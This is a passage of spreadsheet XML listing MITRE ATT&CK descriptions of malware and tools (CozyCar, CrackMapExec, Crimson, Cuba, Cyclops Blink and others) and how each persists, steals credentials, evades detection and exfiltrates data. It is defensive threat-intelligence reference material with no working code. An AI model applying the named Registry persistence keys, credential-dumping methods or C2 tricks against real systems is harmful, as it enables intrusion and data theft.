    <t>[CostaBricks](https://attack.mitre.org/software/S0614) can inject a payload into the memory of a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) can implement a custom-built virtual machine mechanism to obfuscate its code.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) has executed [Mimikatz](https://attack.mitre.org/software/S0002) to harvest stored credentials from the victim and further victim penetration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The payload of [CozyCar](https://attack.mitre.org/software/S0046) is encrypted with simple XOR with a rotating key. The [CozyCar](https://attack.mitre.org/software/S0046) configuration file has been encrypted with RC4 keys.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys: &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The [CozyCar](https://attack.mitre.org/software/S0046) dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The [CozyCar](https://attack.mitre.org/software/S0046) dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main [CozyCar](https://attack.mitre.org/software/S0046) component.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a scheduled task.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Password stealer and NTLM stealer modules in [CozyCar](https://attack.mitre.org/software/S0046) harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>The main [CozyCar](https://attack.mitre.org/software/S0046) dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>A system info module in [CozyCar](https://attack.mitre.org/software/S0046) gathers information on the victim host’s configuration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Some versions of [CozyCar](https://attack.mitre.org/software/S0046) will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046)'s main method of communicating with its C2 servers is using HTTP or HTTPS.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>A module in [CozyCar](https://attack.mitre.org/software/S0046) allows arbitrary commands to be executed by invoking &lt;code&gt;C:\Windows\System32\cmd.exe&lt;/code&gt;.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a Windows service.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can set a scheduled task on the target system to execute commands remotely using [at](https://attack.mitre.org/software/S0110).(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force supplied user credentials across a network range.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the domain user accounts on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can gather the user accounts within domain groups.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover specified filetypes and log files on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords from LSA secrets for the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can create a registry key using wdigest.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the shared folders and associated permissions for a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can pass the hash to authenticate via SMB.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force passwords for a specified user on a single target system or across an entire network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover the password policies applied to the target system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force credential authentication by using a supplied list of usernames and a single password.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can execute PowerShell commands via WMI.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active IP addresses, along with the machine name, within a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump usernames and hashed passwords from the SAM.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the system drives and associated system name.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can collect DNS information from the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active sessions for a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[CrackMapExec](https://attack.mitre.org/software/S0488) can execute remote commands using Windows Management Instrumentation.(Citation: CME Github September 2018)	</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use legitimate OAuth refresh tokens to authenticate with OneDrive.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use OneDrive for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can upload files to C2 from victim machines.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use cloud services including OneDrive for data exfiltration.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can specify the local file path to upload files from.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can download files to the compromised host.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use Powershell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use HTTPS for C2 using the Microsoft Graph API.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use stolen credentials to authenticate on target networks.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can connect to C2 for data exfiltration.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use Base64 to encode its C2 traffic.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use `getmac` and `Get-NetIPAddress` to enumerate network settings.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can execute `getUsername` on compromised systems.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use HTTP for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can perform audio surveillance using microphones.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to steal credentials from Web browsers on the victim machine.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can collect information from a compromised host.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to collect data from removable drives.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can decode its encoded PE file prior to execution.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can exfiltrate stolen information over its C2.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Crimson](https://attack.mitre.org/software/S0115) has the ability to delete files from a compromised host.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)	 </t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to retrieve files from its C2 server.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can use a module to perform keylogging on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect and exfiltrate emails from Outlook.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can set a Registry key to determine how long it has been installed and possibly to indicate the version number.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Crimson](https://attack.mitre.org/software/S0115) uses a custom TCP protocol for C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)	 </t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) has the ability to discover pluggable/removable drives to extract files from.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Crimson](https://attack.mitre.org/software/S0115) contains a command to list processes.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)	 </t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can check the Registry for the presence of &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate&lt;/code&gt; to determine how long it has been installed on a host.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can add Registry run keys for persistence.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can spread across systems by infecting removable media.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to perform screen captures.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect information about anti-virus software on the victim.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim PC name, disk drive information, and operating system.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Crimson](https://attack.mitre.org/software/S0115) can identify the geographical location of a victim host.(Citation: Kaspersky Transparent Tribe August 2020)	 </t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim MAC address and LAN IP.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can identify the user on a targeted system.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) has the ability to determine the date and time on a compromised host.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can determine when it has been installed on a host for at least 15 days before downloading the final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can capture webcam video on targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can use a HTTP GET request to download its final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) has the ability to execute commands with the COMSPEC environment variable.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) can list all files on a system.</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) creates a Launch Agent on macOS.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) uses run keys for persistence on Windows</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is capable of taking screen captures.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used the WinRAR utility to compress and encrypt stolen files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can automatically monitor removable drives in a loop and copy interesting files.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has automatically exfiltrated stolen files to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can use Dropbox to receive commands and upload stolen data.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate files from compromised systems.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor removable drives and exfiltrate files matching a given extension list.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate data over the primary C2 channel (Dropbox HTTP API).(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has exfiltrated stolen data to Dropbox.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has used a hardcoded GitHub repository as a fallback channel.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has staged stolen files in the &lt;code&gt;C:\AMD\Temp&lt;/code&gt; directory.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has established persistence with a scheduled task impersonating the Outlook item finder.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) can monitor for removable drives being plugged into the compromised machine.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has the ability to persist using scheduled tasks.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) has conducted C2 communications with a Dropbox account using the HTTP API.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can retrieve files from the local file system.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can engage in encrypted communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability delete files from a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can scan a directory to identify files for deletion.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability to send and receive files.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can use TCP in communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) can gather data on the user of a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) has used &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt; to elevate privileges.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has the ability to encrypt system data and add the ".cuba" extension to encrypted files.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can use the command &lt;code&gt;cmd.exe /c del&lt;/code&gt; to delete its artifacts from the system.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can enumerate files by using a variety of functions.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has executed hidden PowerShell windows.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can download files from its C2 server.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) logs keystrokes via polling by using &lt;code&gt;GetKeyState&lt;/code&gt; and &lt;code&gt;VkKeyScan&lt;/code&gt; functions.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can discover shared resources using the &lt;code&gt;NetShareEnum&lt;/code&gt; API call.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can enumerate processes running on a victim's machine.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) loaded the payload into memory using PowerShell.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) has a hardcoded list of services and processes to terminate.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has a packed payload when delivered.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can enumerate local drives, disk type, and disk free space.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can check if Russian language is installed on the infected machine by using the function &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt;.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can retrieve the ARP cache from the local system by using &lt;code&gt;GetIpNetTable&lt;/code&gt;.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can use the function &lt;code&gt;GetIpNetTable&lt;/code&gt; to recover the last connections to the victim's machine.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>[Cuba](https://attack.mitre.org/software/S0625) can query service status using &lt;code&gt;QueryServiceStatusEx&lt;/code&gt; function.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) has used &lt;code&gt;cmd.exe /c&lt;/code&gt; and batch files for execution.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Cuba](https://attack.mitre.org/software/S0625) can modify services by using the &lt;code&gt;OpenService&lt;/code&gt; and &lt;code&gt;ChangeServiceConfig&lt;/code&gt; functions.(Citation: McAfee Cuba April 2021) </t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can encrypt C2 messages with AES-256-CBC sent underneath TLS. OpenSSL library functions are also used to encrypt each message using a randomly generated key and IV, which are then encrypted using a hard-coded RSA public key.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can upload files from a compromised host.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can decrypt and parse instructions sent from C2.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can modify the Linux iptables firewall to enable C2 communication via a stored list of port numbers.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to upload exfiltrated files to a C2 server.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use the Linux API `statvfs` to enumerate the current working directory.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to download files to target systems.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to create a pipe to enable inter-process communication.(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can rename its running process to &lt;code&gt;[kworker:0/1]&lt;/code&gt; to masquerade as a Linux kernel thread. [Cyclops Blink](https://attack.mitre.org/software/S0687) has also named RC scripts used for persistence after WatchGuard artifacts.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has used [Tor](https://attack.mitre.org/software/S0183) nodes for C2 traffic.(Citation: NCSC CISA Cyclops Blink Advisory February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use various Linux API functions including those for execution and discovery.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use a custom binary scheme to encode messages with specific commands and parameters to be executed.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can enumerate the process it is currently running under.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use DNS over HTTPS (DoH) to resolve C2 nodes.(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to execute on device startup, using a modified RC script named S51armled.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to query device information.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can use the Linux API `if_nameindex` to gather network interface names.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images.(Citation: NCSC Cyclops Blink February 2022)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) can download files via HTTP and HTTPS.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has encrypted drives using the core encryption mechanism from DiskCryptor.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has masqueraded its service as a legitimate svchost.exe process.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has created Registry keys for persistence.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has used various Windows API functions, including `DeviceIoControl`, as part of its encryption process.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033)'s configuration is encrypted.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has a function to sleep for two hours before rebooting the system.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
